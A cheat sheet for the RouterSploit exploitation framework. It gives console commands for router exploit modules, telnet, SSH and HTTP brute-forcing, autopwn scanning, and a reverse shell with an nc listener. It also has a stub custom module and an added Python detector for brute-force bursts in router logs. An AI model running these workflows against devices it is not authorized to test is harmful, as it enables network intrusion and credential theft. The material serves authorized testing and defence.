RouterSploit

Overview

RouterSploit is an open-source exploitation framework for testing embedded devices, routers, and IoT equipment. It takes a modular approach to vulnerability assessment, credential testing, and exploitation of network devices. It is similar to Metasploit, but specialized for router and embedded-device penetration testing.

Installation

Ubuntu/Debian

git clone https://github.com/threat9/routersploit.git
cd routersploit
pip install -r requirements.txt
python3 rsf.py

macOS

brew install python3
git clone https://github.com/threat9/routersploit.git
cd routersploit
pip3 install -r requirements.txt
python3 rsf.py

Docker

docker run -it threat9/routersploit

From Source

git clone https://github.com/threat9/routersploit.git
cd routersploit
python3 setup.py install
python3 rsf.py

Starting the Interactive Console

python3 rsf.py
# The rsf > prompt appears

Basic Commands

Command               Description
help                  Display all available commands
show modules          List all available modules
search [keyword]      Search modules by name or description
use [module]          Load a specific module
info                  Display module information and options
set [option] [value]  Configure module options
back                  Exit current module
show options          Display current module options
exploit or run        Execute the current module
exit                  Exit RouterSploit

Module Types

Exploits

Modules that exploit vulnerabilities to gain unauthorized access or control:

use exploits/d-link/dir_815_rce
use exploits/netgear/cmd_injection
use exploits/tp-link/authentication_bypass
use exploits/cisco/arbitrary_file_upload

Credential Testing

Modules for testing default credentials and brute-forcing:

use creds/telnet_bruteforce
use creds/ssh_bruteforce
use creds/http_bruteforce
use creds/default_creds

Scanners

Modules that scan for vulnerabilities without exploitation:

use scanners/autopwn
use scanners/port_scanner
use scanners/service_scanner
use scanners/vulnerability_scanner

Payloads

Modules for generating and delivering payloads:

use payloads/reverse_shell
use payloads/bind_shell

Searching and Listing Modules

Search by Keyword

search d-link
search rce
search authentication
search remote_code_execution

List All Modules

show modules
show modules | grep exploit
show modules | grep creds
show modules | grep scanner

Get Module Details

use exploits/netgear/cmd_injection
info
# Shows: description, options, required fields, vendor info

Working with Exploits

Basic Exploit Workflow

# 1. Search for relevant exploit
search netgear

# 2. Load the module
use exploits/netgear/cmd_injection

# 3. View options
show options
# LHOST (attacker IP), LPORT (listener port), TARGET (target IP)

# 4. Set required options
set target 192.168.1.1
set lhost 192.168.1.100
set lport 4444

# 5. Execute exploit
exploit
# or
run

Setting Target Information

set target 192.168.1.1
set target http://192.168.1.1:8080
set rhost 192.168.1.1  # Remote host

Setting Payload Options

set lhost 192.168.1.100    # Listener/attacker host
set lport 4444              # Listener port
set lpass password123       # Listener password
set payload reverse_shell

Viewing Exploit Requirements

info
# Shows which options are required vs optional
show options

Credential Testing

Default Credential Testing

use creds/default_creds
set target 192.168.1.1
set vendor netgear
exploit

Brute-Force Attack

use creds/telnet_bruteforce
set target 192.168.1.1
set username admin
set wordlist /path/to/passwords.txt
exploit

HTTP Credential Brute-Force

use creds/http_bruteforce
set target 192.168.1.1
set username admin
set wordlist /path/to/wordlist.txt
set threads 4
exploit

SSH Brute-Force

use creds/ssh_bruteforce
set target 192.168.1.1
set port 22
set username root
set wordlist /path/to/passwords.txt
exploit

Scanner Modules

AutoPwn Scanner

Automatically scans for vulnerabilities and attempts exploitation:

use scanners/autopwn
set target 192.168.1.1
exploit
# Scans for known vulnerabilities and exploitation paths

Port Scanner

Identifies open ports on target:

use scanners/port_scanner
set target 192.168.1.1
set ports 1-1000
exploit

Service Detection

Identifies services and versions:

use scanners/service_scanner
set target 192.168.1.1
exploit

Vulnerability Scanner

Scans for known vulnerabilities:

use scanners/vulnerability_scanner
set target 192.168.1.1
set vendor netgear
exploit

Supported Vendors

RouterSploit includes modules for major router and embedded device manufacturers:

Vendor    Common Vulnerabilities
D-Link    Directory traversal, RCE, auth bypass
Netgear   Command injection, authenticated RCE
TP-Link   Authentication bypass, RCE
Cisco     File upload, auth bypass, buffer overflow
Huawei    Authentication bypass, RCE
Ubiquiti  Authentication bypass, RCE
Linksys   Command injection, firmware upload
Belkin    Default credentials, auth bypass
ASUS      Arbitrary file upload, RCE
Mikrotik  Authentication bypass, RCE

Common Workflows

Reconnaissance and Exploitation

# Step 1: Scan target network
use scanners/port_scanner
set target 192.168.1.1
exploit

# Step 2: Identify device and run AutoPwn
use scanners/autopwn
set target 192.168.1.1
exploit

# Step 3: Attempt default credentials
use creds/default_creds
set target 192.168.1.1
exploit

Targeted Exploitation

# Know target device? Search directly
search "TP-Link WR841N"

# Load specific exploit
use exploits/tp-link/wr841n_rce

# Set options
set target 192.168.1.1
set lhost 192.168.1.100

# Execute
exploit

Credential Harvesting

# Multiple credential testing approaches
use creds/default_creds
set target 192.168.1.1
exploit

# Then brute-force remaining services
use creds/telnet_bruteforce
set target 192.168.1.1
exploit

Post-Exploitation Shell Access

# After successful exploit, obtain shell
# Set up listener (in separate terminal)
nc -lvnp 4444

# In RouterSploit, execute reverse shell payload
set payload reverse_shell
set lhost 192.168.1.100
set lport 4444
exploit

# Shell connects to listener

Custom Module Creation

Module Structure

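Create a custom exploit under routersploit/modules/exploits/custom/:

# Brings in the Opt* option types, the print_* helpers and the @mute decorator
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    """Custom Router Exploitation Module"""

    # The console reads module metadata from the __info__ attribute
    __info__ = {
        'name': 'Custom Router RCE',
        'description': 'Custom exploitation module description',
        'vendor': 'Custom Vendor',
        'model': 'Custom Model',
        'version': '1.0',
    }

    # Options shown by "show options" and changed with "set"
    target = OptIP('', 'Target IP')
    port = OptPort(80, 'Target port')

    @mute
    def check(self):
        """Check if target is vulnerable"""
        # Vulnerability check logic; return True only when it is confirmed
        return False

    def run(self):
        """Execute exploit"""
        # Exploitation logic
        pass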

RouterSploit vs Metasploit

Feature              RouterSploit     Metasploit
Focus                Routers/IoT      General penetration testing
Learning Curve       Lower            Higher
Module Availability  Router-specific  Extensive (all targets)
Ease of Use          Simpler          More complex
Customization        Good             Excellent
Community            Smaller          Large
Target Scope         Embedded/Router  Broad
Price                Free             Free community version

Advanced Options

Setting Threads for Brute-Force

use creds/http_bruteforce
set threads 10
# Increases concurrent attempts

Custom Wordlists

set wordlist /path/to/custom/passwords.txt
set username_wordlist /path/to/usernames.txt

Timeout Configuration

set timeout 10
# Increases response wait time for slow networks

Logging Output

exploit > output.log
# Capture results to file

Troubleshooting

Issue                   Solution
Module not found        Use search to find the correct module name
Connection refused      Verify target IP and port accessibility
Exploit fails silently  Run info to verify that all required options are set
Slow brute-force        Increase the threads parameter
Python import errors    Reinstall dependencies: pip install -r requirements.txt

Security Considerations

  • Always obtain written permission before testing
  • Use on devices you own or have explicit authorization to test
  • RouterSploit should only be used for authorized security assessments
  • Document all findings and exploitation attempts
  • Disable unnecessary services on production routers
  • Regularly update firmware on network devices
  • Change default credentials immediately after device setup
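
On the defending side, the credential-testing modules described earlier show up on the device as bursts of failed logins from one source, often across several services. The following is an added example, not part of the original cheat sheet or of RouterSploit: it flags such bursts in router syslog and marks a source whose burst is followed by a successful login. The log lines are constructed, and the message formats, threshold, window and all names are assumptions to adapt to your firmware.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed syslog lines; message formats are assumptions modelled on
# dropbear (SSH) and BusyBox login (telnet) output.
SAMPLE_LOG = """\
2024-05-01T10:00:01 gw dropbear[811]: Bad password attempt for 'root' from 192.168.1.100:51022
2024-05-01T10:00:02 gw dropbear[812]: Bad password attempt for 'root' from 192.168.1.100:51024
2024-05-01T10:00:02 gw login[820]: invalid password for 'admin' on 'pts/0' from '192.168.1.100'
2024-05-01T10:00:03 gw dropbear[813]: Bad password attempt for 'root' from 192.168.1.100:51030
2024-05-01T10:00:05 gw dropbear[815]: Password auth succeeded for 'root' from 192.168.1.100:51040
2024-05-01T10:07:00 gw dropbear[900]: Bad password attempt for 'admin' from 192.168.1.23:40100
2024-05-01T10:30:00 gw dropbear[901]: Bad password attempt for 'admin' from 192.168.1.23:40180
"""

PATTERNS = [  # (service, outcome, regex capturing the source address)
    ("ssh", "fail", re.compile(r"Bad password attempt for '\S+' from ([\d.]+):\d+")),
    ("ssh", "ok", re.compile(r"Password auth succeeded for '\S+' from ([\d.]+):\d+")),
    ("telnet", "fail", re.compile(r"invalid password for '\S+' on '\S+' from '([\d.]+)'")),
]

def detect_bruteforce(log_text, threshold=4, window=timedelta(seconds=60)):
    """Map each source with >= threshold failures inside the window to its details."""
    recent = defaultdict(deque)  # src -> (timestamp, service) of recent failures
    alerts = {}
    for line in log_text.splitlines():  # lines are assumed to be in time order
        stamp, _, rest = line.partition(" ")
        try:
            ts = datetime.fromisoformat(stamp)
        except ValueError:
            continue  # skip lines without a parseable timestamp
        for service, outcome, rx in PATTERNS:
            if not (m := rx.search(rest)):
                continue
            src = m.group(1)
            if outcome == "ok":  # success after a burst: a password was guessed
                if src in alerts:
                    alerts[src]["compromised"] = True
                break
            q = recent[src]
            q.append((ts, service))
            while ts - q[0][0] > window:  # drop failures older than the window
                q.popleft()
            if len(q) >= threshold:
                entry = alerts.setdefault(src, {"services": set(), "compromised": False})
                entry["services"].update(s for _, s in q)
            break
    return alerts
```

Calling detect_bruteforce(SAMPLE_LOG) reports 192.168.1.100 with both services and the compromised flag set, while the two slow failures from 192.168.1.23 stay below the threshold.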

Resources

  • Official GitHub: https://github.com/threat9/routersploit
  • Module documentation in repository
  • Vulnerability research databases (CVE, NVD)
  • Vendor security advisories
  • IoT security blogs and research papers